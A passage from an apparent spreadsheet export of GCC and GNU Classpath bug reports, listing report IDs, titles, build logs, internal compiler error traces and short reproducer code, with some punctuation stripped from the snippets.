1.1-hp-hpux10.20/sys-include CFLAGS=-O2 -g -O2  CXXFLAGS=-g -O2  CFLAGS_FO
R_BUILD=-g -O2 CFLAGS_FOR_TARGET=-O2 -g -O2  INSTALL=/usr/local/bin/install
-c INSTALL_DATA=/usr/local/bin/install -c -m 644 INSTALL_PROGRAM=/usr/local/
bin/install -c INSTALL_SCRIPT=/usr/local/bin/install -c LDFLAGS= LIBCFLAGS
=-O2 -g -O2  LIBCFLAGS_FOR_TARGET=-O2 -g -O2  MAKE=make MAKEINFO=makeinfo
--split-size=5000000 --split-size=5000000  PICFLAG= PICFLAG_FOR_TARGET= SH
ELL=/usr/local/bin/bash RUNTESTFLAGS= exec_prefix=/opt/gnu/gcc/gcc-4.1.0 i
nfodir=/opt/gnu/gcc/gcc-4.1.0/info libdir=/opt/gnu/gcc/gcc-4.1.0/lib include
dir=/opt/gnu/gcc/gcc-4.1.0/include prefix=/opt/gnu/gcc/gcc-4.1.0 tooldir=/op
t/gnu/gcc/gcc-4.1.0/hppa1.1-hp-hpux10.20 gxx_include_dir=/opt/gnu/gcc/gcc-4.1.
0/include/c++/4.1.0 AR=ar AS=/xxx/gnu/gcc-3.3/objdir/./gcc/as LD=/xxx/gnu/
gcc-3.3/objdir/./gcc/collect-ld RANLIB=ranlib NM=/xxx/gnu/gcc-3.3/objdir/./g
cc/nm NM_FOR_BUILD= NM_FOR_TARGET=/xxx/gnu/gcc-3.3/objdir/./gcc/nm DESTDIR
= WERROR= all-recursive
make[3]: Entering directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstd
c++-v3'
Making all in include
make[4]: Entering directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstd
c++-v3/include'
make[4]: execvp: /usr/local/bin/bash: Arg list too long
make[4]: *** [stamp-assoc] Error 127
make[4]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstdc
++-v3/include'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstdc
++-v3'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstdc
++-v3'
make[1]: *** [all-target-libstdc++-v3] Error 2
make[1]: Leaving directory `/xxx/gnu/gcc-3.3/objdir'
make: *** [bootstrap] Error 2
Mon Sep  5 10:04:29 EDT 2005
ARG_MAX is 20478 under HP-UX 10.X and isn't configurable as far as I know.</t>
  </si>
  <si>
    <t>GCC-50018</t>
  </si>
  <si>
    <t>[4.7 regression] fixup_args_size_notes ICE breaks m68k-linux bootstrap</t>
  </si>
  <si>
    <t>Building 4.7-20110806 for m68k-linux fails with an ICE in fixup_args_size_notes:
libtool: compile:  /tmp/objdir/./gcc/xgcc -B/tmp/objdir/./gcc/ -B/home/mikpe/pkgs/linux-x86/cross-m68k/m68k-unknown-linux/bin/ -B/home/mikpe/pkgs/linux-x86/cross-m68k/m68k-unknown-linux/lib/ -isystem /home/mikpe/pkgs/linux-x86/cross-m68k/m68k-unknown-linux/include -isystem /home/mikpe/pkgs/linux-x86/cross-m68k/m68k-unknown-linux/sys-include -DHAVE_CONFIG_H -I. -I/tmp/gcc-4.7-20110806/libgomp -I/tmp/gcc-4.7-20110806/libgomp/config/posix -I/tmp/gcc-4.7-20110806/libgomp -Wall -Werror -pthread -ftls-model=initial-exec -g -O2 -MT work.lo -MD -MP -MF .deps/work.Tpo -c /tmp/gcc-4.7-20110806/libgomp/work.c -o work.o &gt;/dev/null 2&gt;&amp;1
/tmp/gcc-4.7-20110806/libgomp/team.c: In function 'gomp_team_start':
/tmp/gcc-4.7-20110806/libgomp/team.c:271:27: internal compiler error: in fixup_args_size_notes at expr.c:3571
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[4]: *** [team.lo] Error 1
make[4]: *** Waiting for unfinished jobs....
4.7-20110730 built fine.  I'm starting a bisection.</t>
  </si>
  <si>
    <t>GCC-5413</t>
  </si>
  <si>
    <t>g++ fails to understand class template's typedef</t>
  </si>
  <si>
    <t>Help GCC developer! [pls read with fixed-width font the same document could also be found in the attachment]
I found an annoying bug in g++ recently. A simplified test program is
supplied below. This file alone is enough to reproduce the error.
I have tested this program under the following compilers:
1. g++ 2.95.2 mingw32 distribution. Typing g++ -v returns:
   Reading specs from e:\APPS\GCC2.95.2\BIN\..\lib\gcc-lib\mingw32\2.95.2\specs
   gcc driver version 2.95.2 19991024 (release) executing gcc version 2.95.2-mingw
   snapshot 20010329
2. g++ 2.95.3-6 distributed in mingw32 version 1.1. Typing g++ -v returns:
   Reading specs from c:/usr/gcc/bin/../lib/gcc-lib/mingw32/2.95.3-6/specs
   gcc version 2.95.3-6 (mingw special)
3. g++ 2.95.3 in Mandrake Linux version . Typing g++ -v returns:
   Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/specs
   gcc version 2.95.3 19991030 (prerelease)
This error is related to the template feature in the compiler.
The error can be briefly desrcribed as follows:
Suppose we declare a class template called PARENT and in this class we
make a typedef PARENT_type. Any type should work (I have tried arrays
and structs and ints).
Then we declare another class template called CHILD whose base class
is _another_ class template (given in the template parameter of CHILD).
Now we want to use the typedefs declared in the base class. For example
here I typed:
  typedef typename parent_template::PARENT_type CHILD_type1
in the declaration of class CHILD. This is OK as long as we use
CHILD_type1 within the declaration of the class. But once we declare it
OUTSIDE the class declaration (i.e. in the definition of method
  CHILD::this_is_refused(CHILD_type1 xx)           &lt;--+
                                                                       |
below the compiler complains (line number can vary but it refers to  |
the line containing { } after the statement above): -------------------+
  gcc-template-bug1.cpp:100: `parent_template' is not a
  class struct or union type
  gcc-template-bug1.cpp:100: syntax error before `{'
The fact that parent_template is used as a base class
implies that parent_template must be a class. Why can't we
assume that here? BTW I have checked this testcase against Borland C++ 5.5
and Compaq C++ (in Alpha machine) they don't complain about this. Also
ecgs 2.96 for linux-alpha does not complain--but AFAIK this version is
not supported.
Please help me! Is there any solution or patch to this problem? I would
appreciate if you cc: also your reply to my address below.
Wirawan
Release:
gcc-2.95.3-5 and gcc-2.95.3-6
Environment:
mingw32 1.1 (gcc-2.95.3-6) but also other gcc 2.95.x
How-To-Repeat:
See attached file all are there.</t>
  </si>
  <si>
    <t>wirawan0</t>
  </si>
  <si>
    <t>GCC-12244</t>
  </si>
  <si>
    <t>[3.4 Regression] Bootstrap fails with unused parameter warning in cp/decl2.c</t>
  </si>
  <si>
    <t>Bootstrap fails with the message:
stage1/xgcc -Bstage1/ -B/usr/local/sparc-sun-solaris2.8/bin/ -c   -g -O2
-DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-pedantic -Wno-long-long -Werror -Werror -fno-common   -DHAVE_CONFIG_H    -I.
-Icp -I../../gcc -I../../gcc/cp -I../../gcc/../include -I../intl
../../gcc/cp/decl2.c -o cp/decl2.o
../../gcc/cp/decl2.c: In function `cxx_callgraph_analyze_expr':
../../gcc/cp/decl2.c:2574: warning: unused parameter 'walk_subtrees'
make[2]: *** [cp/decl2.o] Error 1</t>
  </si>
  <si>
    <t>GCC-59073</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] ICE with missing increment in OpenMP for-loop</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -fopenmp) triggers an ICE on trunk:
==========================================
void foo()
{
  int i 
#pragma omp distribute parallel for
  for (i = 0 i &lt; 10 i) 
}
==========================================
bug.c: In function 'foo':
bug.c:5:23: error: invalid increment expression
   for (i = 0 i &lt; 10 i) 
                       ^
bug.c:4:9: internal compiler error: in gimplify_omp_for at gimplify.c:6899
 #pragma omp distribute parallel for
         ^
0x7ecf0e gimplify_omp_for
        ../../gcc/gcc/gimplify.c:6899
0x7d9281 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:8188
0x7dd856 gimplify_stmt(tree_node** gimple_statement_d**)
        ../../gcc/gcc/gimplify.c:5657
0x7d9e73 gimplify_statement_list
        ../../gcc/gcc/gimplify.c:1548
0x7d9e73 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:8144
0x7dd856 gimplify_stmt(tree_node** gimple_statement_d**)
        ../../gcc/gcc/gimplify.c:5657
0x7de5b4 gimplify_bind_expr
        ../../gcc/gcc/gimplify.c:1229
0x7da201 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../gcc/gcc/gimplify.c:7926
0x7dd856 gimplify_stmt(tree_node** gimple_statement_d**)
        ../../gcc/gcc/gimplify.c:5657
0x7def5e gimplify_body(tree_node* bool)
        ../../gcc/gcc/gimplify.c:8836
0x7df4b6 gimplify_function_tree(tree_node*)
        ../../gcc/gcc/gimplify.c:8974
0x674d17 analyze_function
        ../../gcc/gcc/cgraphunit.c:638
0x676024 analyze_functions
        ../../gcc/gcc/cgraphunit.c:1005
0x677535 finalize_compilation_unit()
        ../../gcc/gcc/cgraphunit.c:2263
0x53ef53 c_write_global_declarations()
        ../../gcc/gcc/c/c-decl.c:10287
Please submit a full bug report [etc.]
The regression appeared between 4.9.0 20131005 and 4.9.0 20131012.</t>
  </si>
  <si>
    <t>GCC-1462</t>
  </si>
  <si>
    <t>compil don't work with Sun make: use GnuMake.</t>
  </si>
  <si>
    <t xml:space="preserve">From: Alexandre Petit-Bianco 
To: pl@penerf.tls.mms.fr
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/81: compil don't work with Sun make: use GnuMake.
Date: Tue 2 Nov 1999 08:44:04 -0800 (PST)
 pl@penerf.tls.mms.fr writes:
 &gt; mksh: Fatal error in reader: = missing from replacement macro
 &gt; reference Current working directory
 &gt; ..../build/sparc-sun-solaris2.6/libjava
 This error occurs when you're building libjava right? If so I'll
 change the category and the person responsible. It doesn't appear to
 be a gcj (front-end) bug.
 ./A
</t>
  </si>
  <si>
    <t>pl</t>
  </si>
  <si>
    <t>GCC-5970</t>
  </si>
  <si>
    <t>gcc 2.95 namespace problem</t>
  </si>
  <si>
    <t>bug.cpp:25: parse error before `::'
bug.cpp:29: ANSI C++ forbids declaration `c' with no type
bug.cpp:29: conflicting types for `int c'
bug.cpp:38: previous declaration as `class C c'
bug.cpp:30: parse error before `}'
bug.cpp:30: Internal compiler error in `make_decl_rtl' at varasm.c:738
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.95.2 20000220 ( Debian/GNU Linux)
Environment:
i686 kernel 2.2.18pre21
How-To-Repeat:
class C {
 public:
    C()
 }
namespace A::B {
 int i
 C  c
    c
 }</t>
  </si>
  <si>
    <t>matoj</t>
  </si>
  <si>
    <t>GCC-37197</t>
  </si>
  <si>
    <t>-msse4 ICE on __builtin_parityl</t>
  </si>
  <si>
    <t>[hjl@gnu-6 gcc]$ cat /tmp/x.i
int __attribute__ ((noinline))
testl (unsigned long *a int b)
{
  return b ? 1 : __builtin_parityl (*a)
}
[hjl@gnu-6 gcc]$ ./xgcc -B./ -m32 -S /tmp/x.i -O2 -msse4
/tmp/x.i: In function Ã¢testlÃ¢:
/tmp/x.i:5: internal compiler error: output_operand: invalid expression as operand
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[hjl@gnu-6 gcc]$ ./xgcc --version
xgcc (GCC) 4.4.0 20080821 (experimental) [trunk revision 139403]</t>
  </si>
  <si>
    <t>GCC-28963</t>
  </si>
  <si>
    <t>Compiler crash caused by @class definition for superclass</t>
  </si>
  <si>
    <t>gcc -v output:
Using built-in specs.
Target: i586-suse-linux
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib --libexecdir=/usr/lib --enable-languages=cc++objcf95javaada --disable-checking --with-gxx-include-dir=/usr/include/c++/4.0.2 --enable-java-awt=gtk --disable-libjava-multilib --with-slibdir=/lib --with-system-zlib --enable-shared --enable-__cxa_atexit --without-system-libunwind --host=i586-suse-linux
Thread model: posix
gcc version 4.0.2 20050901 (prerelease) (SUSE Linux)
The following code produces a compiler seg fault:
==================================================
@class aSuperClass
@interface aClass : aSuperClass
{}
@end
@implementation aClass
@end
===================================================
If the @class line is omitted then the compiler does not crash and an error message is (correctly) printed about the undefined superclass.
Admittedly the code is wrong but so is the crash!</t>
  </si>
  <si>
    <t>GCC-22461</t>
  </si>
  <si>
    <t>[4.0 Regression] g++.dg/conversion/simd2.C fails</t>
  </si>
  <si>
    <t>The test g++.dg/conversion/simd2.C has been newly added to 4.0 branch but fails
there (at least on hppa2.0w-hpux hppa64-hpux i686-linux ia64-hpux) because
the expected message is not correct for that branch.
/scratch/gcc/nightly-2005-07-12-4.0/src/gcc-4.0/gcc/testsuite/g++.dg/conversion/simd2.C:
In function 'void foo()':
/scratch/gcc/nightly-2005-07-12-4.0/src/gcc-4.0/gcc/testsuite/g++.dg/conversion/simd2.C:15:
error: can't convert between vector values of different size
/scratch/gcc/nightly-2005-07-12-4.0/src/gcc-4.0/gcc/testsuite/g++.dg/conversion/simd2.C:15:
error: can't convert between vector values of different size</t>
  </si>
  <si>
    <t>CLASSPATH-25353</t>
  </si>
  <si>
    <t>Build broken with jikes 1.19</t>
  </si>
  <si>
    <t>Hi all
when building GNU Classpath with jikes 1.19 it turns out that the current build system passes a warning option that does not exist to jikes 1.19 causing it to abort the build.
../classpath/configure --with-jikes=/tmp/jikes-1.19/bin/jikes &amp;&amp; make
[snip]
top_builddir=.. top_srcdir=../../classpath /bin/sh ./gen-classlist.sh standard
Adding java source files from srcdir '../../classpath'.
Adding java source files from VM directory ../../classpath/vm/reference
Adding generated files in builddir '..'.
/tmp/jikooo/bin/jikes +Pno-shadow +Pno-switchcheck +F -encoding UTF-8 -bootclasspath '' -extdirs '' -sourcepath '' --classpath ../../classpath/vm/reference:../../classpath:../../classpath/external/w3c_dom:../../classpath/external/sax:.: -d . @classesError: no-shadow is not a recognized flag for controlling pedantic warnings.
use: jikes [options] [@files] file.java...
For more help try -help or -version.
make[1]: *** [compile-classes] Error 2
make[1]: Leaving directory `/home/topic/projects/classpath/build/lib'
make: *** [all-recursive] Error 1
/tmp/jikes-1.19/bin/jikes --version
Jikes Compiler - Version 1.19 - 1 February 2004
Copyright (C) IBM Corporation 1997-2003 2004.
- Licensed Materials - Program Property of IBM - All Rights Reserved.
Originally written by Philippe Charles and David Shields of IBM Research
Jikes is now maintained and refined by the Jikes Project at:
Please consult this URL for more information and for reporting problems.
I would suggest removing the warning flag to fix the build again.
cheers
dalibor topic</t>
  </si>
  <si>
    <t>GCC-37100</t>
  </si>
  <si>
    <t>/usr/lib/gcc/x86_64-pc-linux-gnu/4.1.2/include/g++-v4/bits/stl_pair.h:99: error 404</t>
  </si>
  <si>
    <t>At /usr/lib/gcc/x86_64-pc-linux-gnu/4.1.2/include/g++-v4/bits/stl_pair.h:99:
/// 
the referenced doc doesn't exist.</t>
  </si>
  <si>
    <t>pentek.imre</t>
  </si>
  <si>
    <t>GCC-64705</t>
  </si>
  <si>
    <t>Bad code generation of sieve on x86-64 because of too aggressive IV optimizations</t>
  </si>
  <si>
    <t>Created attachment 34510
preprocessed sieve program from aburto benchmarks
GCC on trunk generates a bad x86-64 code for the hotest loop in sieve
(preprocessed file in the attachment) for -Ofast -march=core-avx2:
for(k = i + prime  k&lt;=size  k+=prime)
 {
   ci++
   *(flags+k)=0
 }
The GCC generated code is
.L82:
        movb    $0 (%rax)
        addq    %rsi %rax
        addq    $1 %rbx
        leaq    (%rax%rcx) %rdx
        cmpq    %rdx %rbp
        jge     .L82
Here is the code generated by LLVM-3.5 using the same options:
   .LBB41_51:                              # %for.body26.unr
                                        #   Parent Loop BB41_45 Depth=1
                                        # =&gt;  This Inner Loop Header: Depth=2
        incq    %r12
        movb    $0 (%rbx%rax)
        addq    %r14 %rax
        cmpq    %r15 %rax
        jle     .LBB41_51
LLVM generates 5 insns loop instead of 6 insns loop in GCC.
It is achieved by using base+index addressing instead of just base
addressing in GCC which is a result of induction of flags+k expression.
I tried to make base+index addressing with zero cost by the following
patch.
Index: tree-ssa-loop-ivopts.c
===================================================================
--- tree-ssa-loop-ivopts.c      (revision 219705)
+++ tree-ssa-loop-ivopts.c      (working copy)
@@ -34587 +34587 @@ get_address_cost (bool symbol_present b
          end_sequence ()
          acost = seq_cost (seq speed)
-         acost += address_cost (addr mem_mode as speed)
+         acost = 0
          if (!acost)
            acost = 1
I got base+index addressing but still it is 6 insn loop becuase of
induction of other expressions.
.L82:
        movb    $0 (%r8%rax)
        addq    %rcx %rax
        addq    $1 %rbx
        leaq    (%rsi%rax) %rdx
        cmpq    %rdx %r14
        jge     .L82
Again too aggressive iv optimization results in worse code generated
by GCC.  The code can be better which is demonstrated by LLVM-3.5.</t>
  </si>
  <si>
    <t>GCC-53578</t>
  </si>
  <si>
    <t>include/ext/concurrence.h relies on ill-formed narrowing conversions</t>
  </si>
  <si>
    <t>From around line 271 of ext/concurrence.h:
// matches a gthr-win32.h recursive mutex
template
static typename __enable_if::__type
_S_destroy(_Rm* __mx)
This SFINAE device doesn't work in Clang in C++11 mode because the sizeof expression evaluates to a value greater than one and thus the implicit conversion to bool for the first template parameter is a narrowing conversion.
I assume g++ will hit this too once it adds support for the narrowing check in converted constant expressions.</t>
  </si>
  <si>
    <t>GCC-9401</t>
  </si>
  <si>
    <t>[x86] ICE with MMX/SSE codes</t>
  </si>
  <si>
    <t>NOTE: the following error does not appear if -O0 is used
instead of -O3.
g++ -msse -DVECLEN=128 -O3 -static bped.C
In file included from bped.C:33:
ssec-gnu.H:161:18: warning: #warning Shift right for count != 127 not imlemented!
bped.C: In function `int bpedhw(unsigned char* int int int dpvec**)':
bped.C:813: error: unable to find a register to spill in class `GENERAL_REGS'
bped.C:813: error: this is the insn:
(insn:HI 1957 1946 1963 19 0x40499478 (set (reg/v:SI 0 eax [483])
        (subreg:SI (reg/v:V4SF 24 exmm3 [296]) 0)) 38 {*movsi_1} (nil)
    (expr_list:REG_DEAD (reg/v:V4SF 24 exmm3 [296])
        (nil)))
bped.C:813: internal compiler error: in spill_failure at reload1.c:1920
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
unknown
Environment:
Linux version 2.4.18-10
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 15
model           : 2
model name      : Intel(R) Pentium(R) 4 CPU 2.00GHz
stepping        : 4
cpu MHz         : 1994.142
cache size      : 512 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic epmtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm
bogomips        : 3971.48
How-To-Repeat:
g++ -msse -DVECLEN=128 -O3 -static bped.ii</t>
  </si>
  <si>
    <t>kfredrik</t>
  </si>
  <si>
    <t>GCC-46938</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/pr43157.c (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr43157.c   -O1 -flto -fuse-linker-plugin  -
lm   -o pr43157.exe    (timeout = 300)
xgcc: fatal error: -fuse-linker-plugin but liblto_plugin.so not found
compilation terminated.
compiler exited with status 1
output is:
xgcc: fatal error: -fuse-linker-plugin but liblto_plugin.so not found
compilation terminated.
FAIL: gcc.dg/pr43157.c (test for excess errors)
Excess errors:
xgcc: fatal error: -fuse-linker-plugin but liblto_plugin.so not found
compilation terminated.
With -v:
Reading specs from /test/gnu/gcc/objdir/gcc/specs
COLLECT_GCC=/test/gnu/gcc/objdir/gcc/xgcc
COLLECT_LTO_WRAPPER=/test/gnu/gcc/objdir/gcc/lto-wrapper
Target: hppa64-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu64/bin/as --with-ld=/usr/ccs/bin/ld --enable-shared --with-local-prefix=/opt/gnu64 --prefix=/opt/gnu64/gcc/gcc-4.6.0 --build=hppa64-hp-hpux11.11 --enable-threads=posix --disable-nls --with-gmp=/opt/gnu64/gcc/gcc-4.6.0 --with-libelf=/opt/gnu64 --enable-languages=cc++objcobj-c++fortranlto
Thread model: posix
gcc version 4.6.0 20101214 (experimental) [trunk revision 167781] (GCC) 
COLLECT_GCC_OPTIONS='-B' '/test/gnu/gcc/objdir/gcc/' '-O1' '-flto' '-fuse-linker-plugin' '-o' 'pr43157.exe' '-v'
 /test/gnu/gcc/objdir/gcc/cc1 -quiet -v -iprefix /test/gnu/gcc/objdir/gcc/../lib/gcc/hppa64-hp-hpux11.11/4.6.0/ -isystem /test/gnu/gcc/objdir/gcc/include -isystem /test/gnu/gcc/objdir/gcc/include-fixed /test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr43157.c -quiet -dumpbase pr43157.c -auxbase pr43157 -O1 -version -flto -fuse-linker-plugin -o /var/tmp//cc8dn1cK.s
GNU C (GCC) version 4.6.0 20101214 (experimental) [trunk revision 167781] (hppa64-hp-hpux11.11)
	compiled by GNU C version 4.6.0 20101214 (experimental) [trunk revision 167781] GMP version 5.0.1 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /test/gnu/gcc/objdir/gcc/../lib/gcc/hppa64-hp-hpux11.11/4.6.0/include
ignoring nonexistent directory /test/gnu/gcc/objdir/gcc/../lib/gcc/hppa64-hp-hpux11.11/4.6.0/include-fixed
ignoring nonexistent directory /test/gnu/gcc/objdir/gcc/../lib/gcc/hppa64-hp-hpux11.11/4.6.0/../../../../hppa64-hp-hpux11.11/include
ignoring nonexistent directory /test/gnu/gcc/objdir/gcc/../lib/gcc/../../lib/gcc/hppa64-hp-hpux11.11/4.6.0/include
ignoring nonexistent directory /test/gnu/gcc/objdir/gcc/../lib/gcc/../../include
ignoring nonexistent directory /test/gnu/gcc/objdir/gcc/../lib/gcc/../../lib/gcc/hppa64-hp-hpux11.11/4.6.0/include-fixed
ignoring nonexistent directory /test/gnu/gcc/objdir/gcc/../lib/gcc/../../lib/gcc/hppa64-hp-hpux11.11/4.6.0/../../../../hppa64-hp-hpux11.11/include
#include ... search starts here:
#include  search starts here:
 /test/gnu/gcc/objdir/gcc/include
 /test/gnu/gcc/objdir/gcc/include-fixed
 /opt/gnu64/include
 /usr/include
End of search list.
GNU C (GCC) version 4.6.0 20101214 (experimental) [trunk revision 167781] (hppa64-hp-hpux11.11)
	compiled by GNU C version 4.6.0 20101214 (experimental) [trunk revision 167781] GMP version 5.0.1 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 7ccd9647394182dfe07867e5fd941d9c
COLLECT_GCC_OPTIONS='-B' '/test/gnu/gcc/objdir/gcc/' '-O1' '-flto' '-fuse-linker-plugin' '-o' 'pr43157.exe' '-v'
 /opt/gnu64/bin/as -v -o /var/tmp//ccAnbwpu.o /var/tmp//cc8dn1cK.s
GNU assembler version 2.20.51 (hppa64-hp-hpux11.11) using BFD version (GNU Binutils) 2.20.51.20100309
xgcc: fatal error: -fuse-linker-plugin but liblto_plugin.so not found
compilation terminated.
HP linker doesn't support linker plugins.</t>
  </si>
  <si>
    <t>GCC-7271</t>
  </si>
  <si>
    <t>having problem with pointer to pointer with const in function calling</t>
  </si>
  <si>
    <t>i have a function of following kind. Which means to my understanding ppi is a pointer to pointer to constant integer. ie (**ppi cannot be modified).
void func(const int **ppi)
{
}
i tried to call this function like this
int main()
{
int **ppi
//some initialization of ppi stuff
func(ppi)
return 1
}
when i compile this i am getting a warning which i feel wrong.
it says argument has pointer type mismatch. 
i am passing a modifiable data to a function which will not modify the data(hence const in the hope that in future it may be passed some constant which does happen in my code). 
can u tell a scenario in which this can lead to disaster? so what does the warning signify?
similarly
when formal argument is of type
int *const **pppi
and actual argument is of type
int ***pppi
it says a warning.
but it didnot say anything when formal argument is
int *const *ppi
and actual argument is
int **ppi
what is the diff in above three cases that causes first two to throw a warning while third compiled quitely?
am i bugging u too much?
Release:
gcc 2.95.3 suse linux 7.2 build
Environment:
suse linux 7.2
How-To-Repeat:
not appilcaple</t>
  </si>
  <si>
    <t>send2pradeep</t>
  </si>
  <si>
    <t>GCC-29106</t>
  </si>
  <si>
    <t>[4.0 Regression] sizeof(*var) in expression drops entire line of code out of compile</t>
  </si>
  <si>
    <t>#include 
int main()
{
    int* const savepos = sizeof(*savepos) ? 0 : 0
    // code for the next line is left out!
    printf(size of thingy is %d\n sizeof(*savepos))
}
Any line of code containing sizeof(*savepos) gets stripped.   If you compile and run this nothing is printed.</t>
  </si>
  <si>
    <t>deb</t>
  </si>
  <si>
    <t>GCC-56022</t>
  </si>
  <si>
    <t>[4.8 regression] ICE (segfault) at convert_memory_address_addr_space (explow.c:334)</t>
  </si>
  <si>
    <t>% cat ice.cpp
typedef float __m256 __attribute__ ((__vector_size__ (32) __may_alias__))
__attribute__((target(no-avx))) static bool currentImplementationSupported() {}
__m256 foo0(__m256 a) {}
% /opt/gcc-4.8-snapshot/bin/g++ -mavx -c ice.cpp
ice.cpp: In function â€˜__m256 foo0(__m256)â€™:
ice.cpp:3:24: internal compiler error: Segmentation fault
 __m256 foo0(__m256 a) {}
                        ^
0xab4dcf crash_signal
        ../.././gcc/toplev.c:332
0x875c4a convert_memory_address_addr_space(machine_mode rtx_def* unsigned char)
        ../.././gcc/explow.c:334
0x914476 expand_function_end()
        ../.././gcc/function.c:5166
0x7ca8d7 construct_exit_block
        ../.././gcc/cfgexpand.c:4219
0x7ca8d7 gimple_expand_cfg
        ../.././gcc/cfgexpand.c:4627
% /opt/gcc-4.8-snapshot/bin/g++ --version
g++ (GCC) 4.8.0 20130113 (experimental)</t>
  </si>
  <si>
    <t>GCC-52092</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: internal consistency failure</t>
  </si>
  <si>
    <t>[regehr@gamow tmp]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r183824-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r183824-install --program-prefix=r183824- --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20120202 (experimental) (GCC) 
[regehr@gamow tmp]$ current-gcc -c -Ofast small.c
small.c: In function 'fn16':
small.c:37:1: error: invalid rtl sharing found in the insn
(insn 125 124 126 25 (parallel [
            (set (reg:QI 75)
                (plus:QI (reg:QI 74)
                    (subreg:QI (reg:SI 67 [ D.1765 ]) 0)))
            (clobber (reg:CC 17 flags))
        ]) -1
     (nil))
small.c:37:1: error: shared rtx
(subreg:QI (reg:SI 67 [ D.1765 ]) 0)
small.c:37:1: internal compiler error: internal consistency failure
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@gamow tmp]$ cat small.c
int abcdefg
int fn4 ()
{
  c = d || a
  return c ? a : b
}
char fn6 (int p1 int p2)
{
  return p1 * p2
}
int fn9 ()
{
  return e
}
void fn16 ()
{
  for ()
    {
      int *h = 0
      int i = 3
      int **j = 
      if (fn9 ())
	{
	  g = fn4 ()
	  if (fn6 (i g))
	    {
	      h = 
	      *h = 0
	    }
	  **j = 0
	}
    }
}</t>
  </si>
  <si>
    <t>GCC-27584</t>
  </si>
  <si>
    <t>ICE on invalid associate(x(y))</t>
  </si>
  <si>
    <t>I get an ICE using:
--------------------------
program test
   implicit none
   real pointer :: x
   real target :: y
   if(ASSOCIATED(X(Y))) print * 'Hello'
end program test
--------------------------
(If one corrects the error and uses associated(xy) gfortran is happy.)
test2.f90:0: internal compiler error: in gfc_check_associated at fortran/check.c:535
g95:
In file test2.f90:5
   if(ASSOCIATED(X(Y))) print * 'Hello'
                     1
Error: 'target' argument of 'associated' intrinsic at (1) must be a POINTER or a TARGET
ifort:
fortcom: Error: test2.f90 line 5: The TARGET argument must have the POINTER or TARGET attribute.   [ASSOCIATED]
   if(ASSOCIATED(X(Y))) print * 'Hello'
--------------------^
NAGf95:
Error: test2.f90 line 5: TARGET arg to ASSOCIATED intrinsic not pointer/target</t>
  </si>
  <si>
    <t>tobias.burnus</t>
  </si>
  <si>
    <t>GCC-51248</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE with pointer to enum</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 4.6.0:
===================================
enum E { e = sizeof(const E*) }
===================================
bug.cc:1:31: internal compiler error: in finish_enum at cp/decl.c:12266</t>
  </si>
  <si>
    <t>GCC-11773</t>
  </si>
  <si>
    <t>GCOV misreports coverage for in-class C++ member functions</t>
  </si>
  <si>
    <t>Code (see uuencoded file src.tgz at the end of the message)
being compiled with command:
&gt; g++ -fprofile-arcs -ftest-coverage *.cc -o tst
Then program is being run:
&gt; ./tst
Then gcov being run:
&gt; gcov -l a.cc
&gt; gcov -l b.cc
WRONG RESULT OBTAINED:
in b.cc.a.h.gcov I find:
                void
      ######    a() {
      ######      printf(AA\n)
                }
this report means that function A::a() isn't used in b.cc
In fact as seen in sources it's invoked from b.cc.
Thanx
Yuri.
--------- code ----------------------------------------------
begin 644 src.tgz
